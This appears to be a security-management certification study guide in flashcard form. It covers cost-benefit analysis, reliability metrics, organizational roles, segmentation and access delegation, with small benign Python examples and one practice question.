Cost-benefit analysis is a process by which business decisions are examined. It is used to calculate and total up the equivalent money value of the benefits and costs to the community of projects to determine if they are worthy pursuits. Cost benefit analysis refers both to: Helping to appraise, or assess, the case for a project, program, or policy proposal; An approach to making economic decisions of any kind. Under both definitions, the process involves, either overtly or implicitly, weighing the total anticipated costs against the total expected benefits of one or more actions in order to narrow down the best or most profitable option. The formal process is often referred to as either CBA (Cost-Benefit Analysis) or BCA (Benefit-Cost Analysis). Here are the steps involved in a generic cost-benefit analysis process:
Show answer and Breakdown
Answer:
- Establish alternative projects/programs
- Compile a list of key players
- Select measurements and collect all cost and benefit elements
- Predict the outcome of costs and benefits over the duration of the project
- Express all costs and benefits in dollars
- Apply the discount rate
- Calculate the net present value of each project option
- Perform sensitivity analysis
- Make a recommendation
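The "apply the discount rate" and "calculate the net present value" steps above reduce to a short formula. Here is a minimal Python sketch; the cash-flow figures and the 8% discount rate are illustrative assumptions.

```python
# Net present value: discount each year's cash flow back to today.
# cash_flows[0] is the initial (year-0) outlay, entered as a negative.

def npv(rate, cash_flows):
    return sum(cf / (1 + rate) ** t for t, cf in enumerate(cash_flows))

# Year 0: -100k outlay; years 1-3: 45k in annual benefits, at 8%.
result = npv(0.08, [-100_000, 45_000, 45_000, 45_000])
print(round(result, 2))   # ~15969.37; positive NPV favors the project
```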
What is Return on Investment?
Define Return on Investment.
Return on Investment or ROI is a value that aids the process of capital investment decisions. It is calculated by dividing the annual benefit by the…
Show answer and Breakdown
Answer:
investment amount. On its own, however, ROI can be an unreliable measure of success or corporate value, since the value of an asset is not always a reliable indicator of its actual worth.
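The formula as defined above (annual benefit divided by the investment amount) is a one-liner; the figures below are illustrative.

```python
# ROI per the definition above: annual benefit / investment, as a percent.

def roi(annual_benefit, investment):
    return annual_benefit / investment * 100

print(f"{roi(annual_benefit=30_000, investment=120_000):.1f}%")  # 25.0%
```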
What is the Total Cost of Ownership (TCO)?
What is the Total Cost of Ownership (TCO)?
The total cost of ownership (TCO) is a financial estimate designed to help consumers and enterprise managers evaluate direct and indirect costs. Many organizations use…
Show answer and Breakdown
Answer:
TCO because it provides a statement of the financial impact of deploying information technology over its whole life cycle.
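A minimal sketch of a TCO calculation follows: acquisition cost plus recurring direct and indirect costs over the solution's expected lifetime. The cost categories and figures are illustrative assumptions; real TCO models include many more line items.

```python
# TCO sketch: acquisition plus recurring costs over the life cycle.

def tco(acquisition, annual_costs, years):
    """Acquisition cost plus recurring costs over the expected lifetime."""
    return acquisition + years * sum(annual_costs.values())

print(tco(acquisition=50_000,
          annual_costs={"support": 8_000, "licensing": 5_000,
                        "training": 2_000, "power_and_space": 1_500},
          years=5))   # -> 132500
```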
What is Proactive Cyber Defense?
Define proactive cyber defense.
Proactive Cyber Defense is defined as acting in anticipation of an attack against computers and networks in order to defend against it. Proactive cyber defense often requires…
Show answer and Breakdown
Answer:
additional security from Internet service providers. Part of the motivation for a proactive defense strategy is cost and choice: making choices after an attack has occurred is challenging and costly. Proactive defense helps mitigate operational risk.
Review the Effectiveness of Your Existing Security
Security effectiveness review.
Reviewing the effectiveness of existing security helps to…
Show answer and Breakdown
Answer:
preserve the safety and security of the organization’s assets. It indicates whether or not the current security system is actually effective at securing the network.
What is Reverse Engineering?
What is reverse engineering?
Reverse engineering is a process of learning the technological principles of a device, object, or system through evaluation of…
Show answer and Breakdown
Answer:
its structure, function, and operation. It often involves dissecting an element and analyzing its workings in detail, either for maintenance or in an attempt to produce a new device or program that does the same thing without using or simply duplicating the original.
Performing a Security Solutions Analysis
When performing a security solutions analysis on your organization’s existing platforms and applications, what steps should you follow?
When evaluating security solutions for your organization’s existing platforms and applications, ensure that they meet all business needs along the following dimensions:
- Performance: When implementing security solutions, a user must ensure that the security solutions support all business needs.
- Latency: Latency measures the time delay experienced in a system; the precise estimation depends on the system and the time being measured.
- Capability: Capability-based security aids in the development of secure computing systems. A capability (defined in some systems as a key) is a communicable, unforgeable token of authority. It refers to a value that references an object along with an associated set of access rights.
- Usability: Usability testing evaluates an application by testing it on users. This is an exceptional usability practice, as it provides direct input on how real users use the system, and it focuses on evaluating an application’s capacity to meet its intentions. Examples of products that benefit from usability testing are web sites, web applications, computer interfaces, documents, and devices.
- Maintainability: The capability to correct flaws in the existing functionality without compromising other components of the system.
- Scalability: Scalability testing evaluates a software application’s potential to scale up or scale out in terms of its non-functional capabilities, such as the user load supported, the number of transactions, and the data volume. It is a test intended to make certain that both the functionality and the performance of the system will scale up to meet specified requirements. This kind of non-functional software testing is often referred to as load/endurance testing; performance, scalability, and reliability are usually considered together by software quality analysts. Scalability is the ability of a system, network, or process to handle a growing amount of work in a capable manner, or its ability to be enlarged to accommodate that growth. Scalability can be measured in several ways, including:
Show answer and Breakdown
Answer:
– Administrative scalability: expanding the number of organizations that share a single distributed system.
– Functional scalability: enhancing the system by adding new functionality with minimal effort.
– Geographic scalability: maintaining performance and usability regardless of how geographically dispersed the system’s nodes and users are.
– Load scalability: the ability of a distributed system to expand and contract its resource pool to accommodate heavier loads.
What is Mean Time to Repair (MTTR)?
What is Mean Time To Repair (MTTR)?
Mean Time To Repair (MTTR) is the average amount of time needed to repair a Configuration Item or IT Service after a failure. It reflects the average time required to…
Show answer and Breakdown
Answer:
fix a failed component or device. Expressed mathematically, it is the total corrective maintenance time divided by the total number of corrective maintenance actions performed within a given period of time. This does not include lead time for parts not immediately available or other Administrative or Logistic Downtime (ALDT).
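The formula above translates directly into code. A minimal sketch, with invented repair durations for illustration:

```python
# MTTR per the definition above: total corrective maintenance time
# divided by the number of corrective maintenance actions.

def mttr(repair_hours):
    return sum(repair_hours) / len(repair_hours)

print(mttr([2.0, 4.5, 1.5, 4.0]))  # (12.0 / 4) -> 3.0 hours
```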
What is Mean Time Between Failures (MTBF)?
Define Mean Time Between Failures (MTBF), then look into the topic a bit further.
Mean Time Between Failures (MTBF) is the predicted elapsed time between inherent failures of a system during operation. MTBF can be estimated as…
Show answer and Breakdown
Answer:
the arithmetic mean time between failures of a system. MTBF is customarily part of a model that assumes the failed system is immediately repaired, as part of a regenerative process. This differs from Mean Time To Failure (MTTF), which calculates the average time to failure under the modeling assumption that the failed system is not repaired. For each observation, the downtime instant occurs after (i.e. is greater than) the uptime instant that preceded it; the difference between the two is the length of time the system was operating between those events. MTBF prediction is an important component in the development of products. Reliability engineers and design engineers often use reliability software to estimate a product’s MTBF according to various methods and standards. However, these prediction methods are not meant to reflect fielded MTBF, as is often believed; their intent is to concentrate design efforts on the weak links in the design. Common MTBF misconceptions: MTBF is often confused with a component’s useful life, even though the two concepts are not directly related. For example, a battery may have a useful life of five hours and an MTBF of 100,000 hours; these figures indicate that in a population of 100,000 batteries, there will be approximately one battery failure every hour during a single battery’s five-hour lifespan. Another common misconception is that MTBF defines the time at which the probability of failure equals the probability of not having a failure (i.e. a reliability of 50%). This is accurate only for certain symmetric distributions; in many instances, such as the (non-symmetric) exponential distribution, it is not. In particular, for an exponential failure distribution, the probability that an item will fail at or before the MTBF is approximately 0.63 (i.e. the reliability at the MTBF is about 37%). For typical distributions, MTBF thus represents only a top-level aggregate statistic and is not effective for predicting a specific time to failure, because of the variability in the time-to-failure distribution. A further misconception is to expect that the MTBF value is higher in a system that uses component redundancy. Component redundancy can raise the system MTBF, but it lowers the hardware MTBF, since the more components a system contains, the more often some hardware component will fail. Variations of MTBF: There are several related measures, such as mean time between system aborts (MTBSA), mean time between critical failures (MTBCF), and mean time between unit replacements (MTBUR).
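To make the exponential-distribution fact above concrete, here is a minimal Python sketch; the operating-hour figures are invented for illustration. Reliability at t = MTBF works out to e^-1, about 37%, matching the quoted figure.

```python
# MTBF as the arithmetic mean of operating time between failures, plus
# reliability at time t for an exponential failure distribution.
import math

def mtbf(hours_between_failures):
    xs = hours_between_failures
    return sum(xs) / len(xs)

def reliability_exponential(t, mtbf_value):
    """R(t) = exp(-t / MTBF) for an exponential failure distribution."""
    return math.exp(-t / mtbf_value)

m = mtbf([900.0, 1_100.0, 1_000.0])             # -> 1000.0 hours
print(round(reliability_exponential(m, m), 2))  # -> 0.37 (i.e. e^-1)
```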
What is Emergency Management?
Define the concept of Emergency Management.
Emergency management is a field that focuses on strategic organizational management processes. It is used to safeguard the critical assets of an organization from the hazard risks brought by disasters or catastrophes, and to maintain…
Show answer and Breakdown
Answer:
their efficiency within their planned lifetime. Successful emergency management is based on the strategic integration of emergency plans at all levels of the organization. It also reflects the understanding that the lower levels of the organization are responsible for managing emergencies and obtaining additional resources and assistance from the upper levels.
Conduct a Lessons Learned / After Action Review (AAR)
What is a Lessons Learned review and an After Action Review (AAR)?
Lessons learned is the process used to glean knowledge from experience and apply it to current and future processes, to deter repeat occurrences of past failures and mishaps. The ultimate objective is to…
Show answer and Breakdown
Answer:
turn any deficiencies and recognized best practices into lessons learned in order to enhance effectiveness. Lessons-learned systems are motivated by the need to crystallize knowledge and convert individual experience into broader, documented knowledge, so that those who encounter a similar context or condition may benefit from applying a lesson learned. An after action review (AAR) is a structured review process for examining what happened, why it happened, and how it can be improved, conducted by the participants and those responsible for the project or event. It spans the cycle of defining the leader’s intent, planning, preparation, action, and review.
What is Guidance of Expert Judgement?
Define “Expert Judgement” and how it aids in difficult decision making.
When working on a project, certain problems will arise for which no established best solution exists. For these issues, you can apply the guidance of expert judgment, which is a technique…
Show answer and Breakdown
Answer:
grounded in expertise acquired in a specific knowledge area or product area. Expert judgment is used when the project manager or a team member needs specialized knowledge they don’t possess. It involves people with advanced knowledge of the work doing the estimating; ideally, the team member responsible for a task should complete its estimates. Expert judgment is also used when performing administrative closure tasks, where experts should make sure the project or phase closure is done to the appropriate standards.
Integrating Security Across Disciplines
Security principles take different shapes and forms across the various disciplines in the organization. What do some of those look like?
Interpreting security requirements and goals to communicate with other disciplines: in many systems and organizations, employees perform their jobs as individuals but also work as members of teams. It’s important to be mindful of the situational awareness of not just individual team members, but also the situational awareness of the organization as a…
Show answer and Breakdown
Answer:
whole. In order to attain a secure solution for the organization, everyone must follow the proper protocols for communicating with other disciplines. Programmers: Normally, a programmer is responsible for writing programs to meet the specific requirements of clients, but in a security context, a programmer is tasked with creating specialized programs that elevate network security. Network engineers: A network engineer is responsible for designing and managing computer networks. The network engineer focuses on the overall integrity of the network and its security, making certain that network connectivity throughout a company’s LAN/WAN infrastructure stays current with technical considerations at the network level of an organization’s hierarchy. Sales staff: The duties and responsibilities of a salesperson differ according to the nature of the business. A salesperson should be equipped with knowledge about the product so they can effectively communicate with customers, should be able to sell a product with the right amount of persuasion, and is responsible for addressing customer concerns and satisfying their interests when they’re considering a product. The salesperson also handles and maintains monetary transactions, greets customers, helps them identify their requirements, promotes products, answers any questions the customer has about the product, negotiates the price, arranges the merchandise properly, and oversees the ordering of supplies.
Understand the Disciplines and Functional Areas in Your Organization
In order to properly plan the security policies across the organization, a security manager must thoroughly know the roles that each discipline and functional area plays in their company.
Programmer: A programmer writes, tests, debugs, and maintains the detailed instructions in computer programs that computers follow to execute their functions. The programmer also conceives, designs, and tests logical structures in order to resolve computer issues. Numerous technical innovations in programming, advanced computing technologies, and sophisticated programming languages and tools have restructured the role of the programmer in an organization. Database administrator: A database administrator develops and designs database strategies; oversees and enhances database performance and capacity; and anticipates and plans for future expansion requirements. This person also plans, coordinates, and applies security measures to safeguard the database. A database administrator is also referred to as a database coordinator or database programmer, and the role is closely related to the database analyst, database modeler, programmer analyst, and systems manager.
The activities performed by a database administrator:
- Transferring data
- Replicating data
- Maintaining the database and ensuring its availability to users
- Maintaining the data dictionary
- Controlling privileges and permissions for database users
- Monitoring database performance
- Maintaining database security
- Preventing data fragmentation
- Granting database access only to authorized persons
A database administrator should possess these skills:
- Strong organizational skills
- Strong logical and analytical thinking
- Ability to concentrate and pay close attention to detail
- Ability to think broadly and consider impacts across systems and within the organization
Network administrator: A network administrator is responsible for the maintenance of the computer hardware and software that make up a computer network, deploying, configuring, maintaining, and monitoring active network equipment. The role entails the operation and configuration of the network with continuous monitoring, in addition to the following duties:
- Ensure proper functioning of the network.
- Design and organize the system network.
- Assign routing procedures and configurations.
- Assign IP addresses to the various devices involved in the system network.
- Take care of system settings and printer settings.
- Debug issues related to the network.
- Set up standard installation packages for all systems to ensure uniformity.
- Evaluate the purchase of new advanced-technology devices.
- Ensure proper connectivity for all end users in the organization.
Management: It is the responsibility of management to make sure employees are covered in terms of finances, health care, and other economic issues, as well as making certain that interpersonal relations and social issues, such as community viability and emotional stability, are healthy.
Stakeholders: A stakeholder is a person, group, or organization that has a direct or indirect stake in an organization. Key stakeholders in a business organization include creditors, customers, directors, employees, the government, owners, suppliers, unions, and the community from which the business draws its resources. Different stakeholders are entitled to different considerations; for instance, the company’s customers are entitled to fair trading practices but not to the same considerations as the company’s employees. Financial: The roles and responsibilities of the financial department play a significant role in the smooth operation of the business. The most standard function of this department is to document and manage incoming and outgoing cash flows as well as the actual processing of the cash flows. The responsibilities of a financial department:
- Budget management
- Grants management
- Salary administration
- Property management
- Purchasing
- Handling cash
HR: The responsibilities of HR vary according to the size of the organization. HR directors, and occasionally HR managers, direct several…
Show answer and Breakdown
Answer:
departments that are led by functional or specialized HR staff such as the training manager, the compensation manager, or the recruiting manager. Human Resources personnel are advocates for both the company and its employees. Emergency response team: The emergency management team is made up of executives and line managers who make critical decisions at the Emergency Operations Center. This team coordinates with the managers who oversee undamaged areas of the business and makes determinations about the use of personnel necessary to support the response and recovery efforts. The leaders of each team report to the emergency management team. Facilities manager: A facility manager is responsible for the best application of company resources and for planning the optimal allocation of space used in new contracts. This person prepares documents that include proposals for the client or contractor. The responsibilities of a facility manager:
- Analyze and manage projects to deliver the desired output within given deadlines.
- Plan new offers with reliability and availability in mind.
- Track all expenses for the services and goods used in completing a project, then determine the profit earned on that project.
- Build an attractive plan with the help of different business strategies.
- Improve current activities with minimum interruption for excellent results.
- Check health and safety points before approval of a building.
- Encourage the various members of the team and maintain interaction between them.
Physical security manager: A physical security manager is responsible for evaluating, recommending, and directing modifications, reporting to the Corporate Security Manager, in order to preserve the security of the organization’s assets, facilities, and employees. This person should have expertise in security principles and security elements. The duties and responsibilities of a physical security manager:
- Coordinate all physical security issues throughout the organization.
- Develop and implement policies, standards, guidelines, and procedures related to physical security operations.
- Manage physical security and BSOC supervisors.
- Take responsibility for the design of security features.
- Develop written physical security plans for critical infrastructures.
- Manage the purchasing, installation, upgrading, and maintenance of all existing physical security equipment.
The Security Impact of Inter-Organizational Change
Explain the security impact of inter-organizational change.
When major changes are imposed on an organization, there is often resistance and displeasure. Organizational change has proven to be a key issue that poses significant challenges to an organization’s effective and timely implementation of privacy and security standards. It is important to…
Show answer and Breakdown
Answer:
identify specific implementation requirements that reflect the most pressing organizational change challenges. Organizations should be aware of processes and methods that foster acceptance of the changes associated with the entire compliance project. In this day and age, organizations are connected to each other through the Internet. With the accelerated growth of the World Wide Web, network security has become a major concern for organizations throughout the world, and the fact that the information and resources needed to corrupt the security of corporate networks are widely available has deepened that concern.
Security Design Considerations During Mergers, Acquisitions and Demergers
Be familiar with security design considerations during mergers, acquisitions and demergers.
Mergers and acquisitions (M&A) is the aspect of corporate strategy, corporate finance, and management dealing with the buying, selling, dividing, and combining of different organizations and similar entities; it can promote rapid growth for an enterprise in its original sector or location, or in a new field or new location, without creating a subsidiary or using a joint venture. A demerger is a type of corporate restructuring in which an entity’s business operations are separated into one or more components; it is the flip side of a merger or acquisition. A demerger can ensue through the transfer of shares in a subsidiary holding the business to the shareholders of the company carrying out the demerger, or when the business is transferred to a new company whose shares are distributed to the original company’s shareholders. Demergers can arise for various business and non-business reasons, such as government intervention through antitrust law or decartelization. The following components should be considered during mergers, acquisitions, and demergers:
Show answer and Breakdown
Answer:
- Software and hardware licenses
- Outsourcing agreements
- Transitional services agreement
- Penalty clauses
- Post-Merger Integration (PMI) costs
Assuring Third-Party Products: Only Introduce Acceptable Risk
Third-party products and applications have security concerns distinct from those of internally developed products.
Acceptable risk is an event whose likelihood of occurrence is minor and whose consequences are modest relative to significant benefits. In these scenarios, individuals are willing to be exposed to the risk that the event might occur. The concept of acceptable risk derives partly from the understanding that guaranteed safety in every instance is an unachievable goal, and that even very low exposures to certain toxic substances may carry some level of risk. Incident detection entails the identification of performance and availability issues facing your end users and customers, with the ability to integrate seamlessly with any third-party products. A third-party product takes a noninvasive approach to…
Show answer and Breakdown
Answer:
validating the security, performance, and availability of infrastructure and applications. It requires no installation of software or components on the networks or servers where your applications reside. This lowers risks to your production systems while raising the benefits of third-party service validation. Custom-developed software is uniquely developed for an organization or user; it is also referred to as bespoke software. Custom-developed software can be contrasted with software packages produced for the mass market, such as commercial off-the-shelf (COTS) software or freely available software. Custom software can be produced by an in-house software development team or commissioned from a software house or independent software developer. Because custom software is produced for a specific customer, it can meet that customer’s particular preferences and needs. Custom software may be designed in incremental phases, allowing hidden dangers to be identified, including those not mentioned in the specifications. The initial step in the software development process may involve several departments, including marketing, engineering, research and development, and general management.
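As a rough illustration of such a noninvasive, agentless check, the Python sketch below probes an application’s availability and TLS certificate entirely from outside the network, with nothing installed on the production servers. The endpoint URL and host are hypothetical, so the calls at the bottom are left commented out.

```python
# A minimal sketch, not from the source material: an external,
# agentless probe of availability and TLS configuration.
import socket
import ssl
import time
import urllib.request

URL = "https://app.example.com/health"   # hypothetical health endpoint
HOST = "app.example.com"                 # hypothetical application host

def check_availability(url: str, timeout: float = 5.0) -> tuple:
    """Fetch the endpoint and report HTTP status and observed latency."""
    start = time.monotonic()
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status, time.monotonic() - start

def check_certificate(host: str, port: int = 443) -> dict:
    """Inspect the server certificate without touching the server itself."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()  # includes issuer, notAfter expiry, etc.

# status, latency = check_availability(URL)
# cert = check_certificate(HOST)
```

Because the probe runs from the outside, a failure in the monitoring tool cannot destabilize the production systems it observes, which is the risk-lowering property described above.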
Commercial Off-The-Shelf Products and Their Security Challenges
Know Commercial Off-The-Shelf products and the security challenges that they present.
COTS is an acronym for Commercial Off-The-Shelf products. These products save time and effort by allowing programs and services to be purchased from a third-party vendor rather than produced in house. COTS products accelerate and lower the cost of system construction, but commonly introduce these issues: click to view
Show answer and Breakdown
Answer:
- Integration: COTS products must be integrated with existing systems, yet they may contain incompatibilities with existing programs and services.
- Dependency on third-party vendors: All COTS products are supplied by third-party vendors. Relying on them creates risk if a vendor goes out of business.
- Failure to meet individual requirements: Because these products are designed for general use, they may not meet the organization’s specific requirements across the board.
- Threat of failure: If COTS products do not produce the desired results, a project may perform poorly or fail completely.
Network Segmentation and Its Advantages
What is network segmentation and what are the advantages that it presents?
Network segmentation in computer networking is the practice of dividing a computer network into sub-networks, each being a network segment. The advantages of such splitting are mainly improved performance and strengthened security: click to view
Show answer and Breakdown
Answer:
- Reduced congestion: Performance improves because a segmented network has fewer hosts per sub-network, reducing local traffic.
- Improved security: Broadcasts are contained to the local network, and the internal network structure is not visible from outside.
- Containing network problems: Segmentation curbs the effect of local failures on other parts of the network.
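To make the idea concrete, here is a minimal sketch, not from the source material, that uses Python’s standard ipaddress module to carve a flat address space into segments; the address range and department names are hypothetical.

```python
import ipaddress

# Hypothetical flat corporate network to be segmented.
corporate = ipaddress.ip_network("10.0.0.0/16")

# Split it into four /18 segments, e.g. one per department, so that
# broadcast traffic and local failures stay inside each segment.
segments = list(corporate.subnets(new_prefix=18))
for name, seg in zip(["engineering", "finance", "hr", "guest"], segments):
    print(f"{name:12} {seg}  ({seg.num_addresses} addresses)")

# Hosts in different segments are in different broadcast domains;
# traffic between them must cross a router, where filtering applies.
host_a = ipaddress.ip_address("10.0.5.20")    # lands in the first segment
host_b = ipaddress.ip_address("10.0.200.20")  # lands in the last segment
print(host_a in segments[0], host_b in segments[0])  # True False
```

In practice each computed segment would map to a VLAN or routed subnet, with access controls applied at the boundaries between them.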
Delegation at the Authentication / Identity Level
Explain the concept of delegation at the authentication or identity level.
If an authentication mechanism allows for an effective identity that differs in any way from the validated identity of the user, it is labeled identity delegation at the authentication level if…
Show answer and Breakdown
Answer:
the owner of the effective identity has previously authorized the owner of the validated identity to use his identity. Current methods of identity delegation using the sudo or su commands of UNIX are very common. A delegated account password, or a specific authorization granted by the system administrator, is required.
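As an illustration only, the hypothetical Python sketch below models that rule: a delegation table records which validated users the owner of each effective identity has authorized in advance, and a session is granted the effective identity only when that prior authorization exists.

```python
# A minimal sketch, not from the source material: identity delegation
# at the authentication level. Table contents are hypothetical.
DELEGATIONS = {
    "appadmin": {"alice", "bob"},   # alice and bob may act as appadmin
    "auditor": {"carol"},           # carol may act as auditor
}

def effective_identity(validated_user: str, requested: str) -> str:
    """Return the identity a session runs under, enforcing delegation."""
    if requested == validated_user:
        return validated_user            # no delegation involved
    if validated_user in DELEGATIONS.get(requested, set()):
        return requested                 # delegation authorized in advance
    raise PermissionError(f"{validated_user} may not act as {requested}")

print(effective_identity("alice", "appadmin"))  # appadmin
print(effective_identity("carol", "carol"))     # carol
# effective_identity("bob", "auditor") would raise PermissionError
```

This mirrors how a sudoers-style policy works: the mapping from validated users to permitted effective identities is fixed by an administrator before any delegation takes place.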
Delegation at Authorization / Access Control Level
Explain the concept of Delegation at Authorization / Access Control Level.
The most widely practiced method of ensuring computer security is the access control techniques provided by operating systems such as UNIX, Linux, Windows, and Mac OS. If the delegation is efficiently…
Show answer and Breakdown
Answer:
configured, as with Role-Based Access Control (RBAC) delegation, there is always a risk of under-delegation. In under-delegation, the delegator does not delegate all the authorizations necessary to carry out the delegated job. This may result in denial of service, which is unacceptable in some environments, especially safety-critical systems. In RBAC-based delegation, one way to achieve delegation is to reassign a group of permissions to the role of a delegate. Identifying the relevant permissions for a specific job is not a simple task in large and complex systems. Additionally, when these permissions are assigned to a delegate role, all other users associated with that same role also obtain the delegated rights. If the delegation is enacted by assigning the roles of a delegator to a chosen delegate, then there is not only an issue of over-delegation but also the added complication that the delegator has to figure out which roles, in the complex hierarchy of RBAC, are required to perform a particular job. These challenges are not a factor in identity delegation mechanisms, where the user interface is normally simpler.
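The following Python sketch, not from the source material, illustrates the under- and over-delegation problem described above; the roles, users, and permissions are invented for the example.

```python
# Hypothetical roles and permission sets.
ROLE_PERMISSIONS = {
    "backup_operator": {"read_files", "write_backup_media"},
    "sysadmin": {"read_files", "write_backup_media",
                 "manage_users", "edit_firewall"},
}
USER_ROLES = {"dana": {"sysadmin"}, "erin": set()}

def permissions_of(user: str) -> set:
    """Union of the permissions of every role assigned to the user."""
    perms = set()
    for role in USER_ROLES[user]:
        perms |= ROLE_PERMISSIONS[role]
    return perms

# Under-delegation: the delegated role lacks a right the job needs,
# so the delegate is denied service when attempting that action.
USER_ROLES["erin"].add("backup_operator")
assert "manage_users" not in permissions_of("erin")

# Over-delegation: handing over the delegator's whole role grants the
# delegate rights the delegated job never required.
USER_ROLES["erin"].add("sysadmin")
assert "edit_firewall" in permissions_of("erin")
```

Choosing a delegate role that is neither too narrow nor too broad is exactly the permission-identification problem the text describes, and it grows with the size of the role hierarchy.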
Basic Network Components
Which of the following is a component that provides resources over a network?
- Client
- LAN
- Router
- Server
Show answer and Breakdown
Answer: The correct answer is 4.
Breakdown: A server provides or “serves” up resources to a network. Examples of resources are access to email, pages on a web server, or files on a file server.
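For illustration, here is a minimal Python sketch, not from the source material, of a server providing a resource over a network; the port number and payload are arbitrary.

```python
# A minimal TCP server that "serves" a small resource to each client.
import socketserver

class HelloHandler(socketserver.StreamRequestHandler):
    def handle(self):
        # Read one request line from the client and answer it.
        request = self.rfile.readline().strip()
        self.wfile.write(b"resource for: " + request + b"\n")

if __name__ == "__main__":
    with socketserver.TCPServer(("127.0.0.1", 9000), HelloHandler) as srv:
        print("serving on 127.0.0.1:9000 (Ctrl+C to stop)")
        srv.serve_forever()
```

Running the script and connecting with any TCP client on port 9000 shows the client (the resource consumer) receiving data from the server (the resource provider), which is the relationship the question tests.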